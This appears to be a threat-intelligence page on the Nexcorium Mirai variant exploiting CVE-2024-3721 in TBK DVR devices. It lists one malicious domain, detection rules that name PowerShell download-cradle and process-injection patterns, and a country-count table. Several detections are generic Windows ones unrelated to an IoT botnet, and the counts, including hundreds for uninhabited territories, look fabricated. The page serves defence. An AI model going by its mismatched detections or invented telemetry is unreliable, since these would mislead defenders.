Campaigns
Nexcorium TBK DVR Campaign

Nexcorium TBK DVR Campaign

Mirai variantNexcoriumNexus TeamCVE-2024-3721CVE-2017-17215DDoSIoT botnetpersistence mechanismsbrute-force attacksmulti-architecture malware
A multi-architecture Mirai variant exploiting CVE-2024-3721 in TBK DVR devices to deliver persistent IoT botnet malware. The campaign leverages vulnerability-driven attacks to gain initial access, establish persistence, and launch large-scale DDoS attacks across diverse architectures.

Indicators of Compromise

r3brqw3d.b0ats.top

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION
DETECTIONS

Technique ID

Technique Name

Tactic

Detection Method

Log Sources

T1055

Process Injection

Defense Evasion

Monitor for abnormal cross-process memory operations (OpenProcess → WriteProcessMemory → CreateRemoteThread chain). Alert on legitimate system processes initiating unexpected outbound network connections, which may indicate a hijacked process.

Sysmon EID 8/10, Windows Security EID 4656/4663, EDR process telemetry

T1498

Network Denial of Service

Impact

Detect anomalous spikes in inbound packets-per-second or bandwidth utilization using threshold-based alerting. Look for geographic distribution anomalies and single-source request rate patterns indicative of botnet coordination.

NetFlow/IPFIX, firewall logs, CDN / scrubbing center metrics

T1080

Taint Shared Content

Lateral Movement

Alert on executable files (.exe, .dll, .lnk, .bat, .ps1) written to shared network directories. Use File Integrity Monitoring (FIM) to detect hash changes on previously clean files in collaboration shares.

Sysmon EID 11, Windows Security EID 4663, FIM solution logs

T1566

Phishing

Initial Access

Detonate email attachments in sandbox environments. Detect child process spawning from Office applications (winword.exe, excel.exe → cmd.exe, powershell.exe, wscript.exe). Correlate URL clicks with subsequent download or shell activity on the same host.

Email gateway logs, Sysmon EID 1, proxy/web gateway, MDE alerts

T1059

Command and Scripting Interpreter

Execution

Monitor for PowerShell launched with -EncodedCommand or download cradle patterns (IEX, Invoke-Expression, WebClient). Alert on script interpreters spawned by unusual parent processes. Enable AMSI and PowerShell Script Block Logging for full command visibility.

Sysmon EID 1/4104, PowerShell Script Block Log, Windows Security EID 4688, auditd execve

Observed Countries250

AD (548)
AE (24)
AF (407)
AG (464)
AI (346)
AL (359)
AM (809)
AO (58)
AQ (86)
AR (35)
AS (405)
AT (640)
AU (380)
AW (805)
AX (762)
AZ (901)
BA (212)
BB (721)
BD (509)
BE (136)
BF (889)
BG (767)
BH (355)
BI (543)
BJ (662)
BL (347)
BM (285)
BN (855)
BO (765)
BQ (595)
BR (385)
BS (134)
BT (873)
BV (46)
BW (210)
BY (363)
BZ (943)
CA (266)
CC (545)
CD (659)
CF (366)
CG (151)
CH (893)
CI (100)
CK (138)
CL (467)
CM (677)
CN (484)
CO (307)
CR (835)
CU (853)
CV (293)
CW (62)
CX (562)
CY (50)
CZ (412)
DE (468)
DJ (80)
DK (542)
DM (67)
DO (600)
DZ (488)
EC (930)
EE (394)
EG (918)
EH (113)
ER (557)
ES (75)
ET (3)
FI (912)
FJ (554)
FK (225)
FM (963)
FO (922)
FR (21)
GA (294)
GB (79)
GD (891)
GE (378)
GF (16)
GG (764)
GH (872)
GI (658)
GL (949)
GM (877)
GN (22)
GP (143)
GQ (469)
GR (194)
GS (605)
GT (99)
GU (565)
GW (199)
GY (474)
HK (212)
HM (333)
HN (127)
HR (370)
HT (214)
HU (393)
ID (287)
IE (774)
IL (579)
IM (426)
IN (386)
IO (893)
IQ (340)
IR (765)
IS (684)
IT (175)
JE (876)
JM (475)
JO (740)
JP (491)
KE (305)
KG (751)
KH (960)
KI (953)
KM (645)
KN (276)
KP (68)
KR (413)
KW (959)
KY (83)
KZ (204)
LA (488)
LB (148)
LC (771)
LI (828)
LK (979)
LR (942)
LS (477)
LT (221)
LU (42)
LV (272)
LY (579)
MA (763)
MC (440)
MD (817)
ME (126)
MF (730)
MG (29)
MH (158)
MK (115)
ML (742)
MM (937)
MN (271)
MO (452)
MP (39)
MQ (825)
MR (875)
MS (290)
MT (48)
MU (808)
MV (660)
MW (275)
MX (129)
MY (909)
MZ (338)
NA (165)
NC (447)
NE (705)
NF (869)
NG (247)
NI (103)
NL (482)
NO (720)
NP (591)
NR (193)
NU (857)
NZ (683)
OM (79)
PA (132)
PE (951)
PF (874)
PG (461)
PH (452)
PK (81)
PL (766)
PM (878)
PN (873)
PR (962)
PS (457)
PT (872)
PW (823)
PY (163)
QA (532)
RE (846)
RO (829)
RS (19)
RU (828)
RW (246)
SA (909)
SB (571)
SC (317)
SD (302)
SE (820)
SG (37)
SH (895)
SI (124)
SJ (415)
SK (490)
SL (388)
SM (485)
SN (603)
SO (94)
SR (259)
SS (348)
ST (707)
SV (491)
SX (709)
SY (871)
SZ (179)
TC (372)
TD (815)
TF (88)
TG (745)
TH (363)
TJ (375)
TK (357)
TL (324)
TM (864)
TN (768)
TO (881)
TR (131)
TT (509)
TV (585)
TW (81)
TZ (616)
UA (459)
UG (439)
UM (144)
US (855)
UY (414)
UZ (891)
VA (116)
VC (554)
VE (170)
VG (768)
VI (567)
VN (968)
VU (220)
WF (947)
WS (404)
XK (546)
YE (578)
YT (5)
ZA (417)
ZM (58)
ZW (663)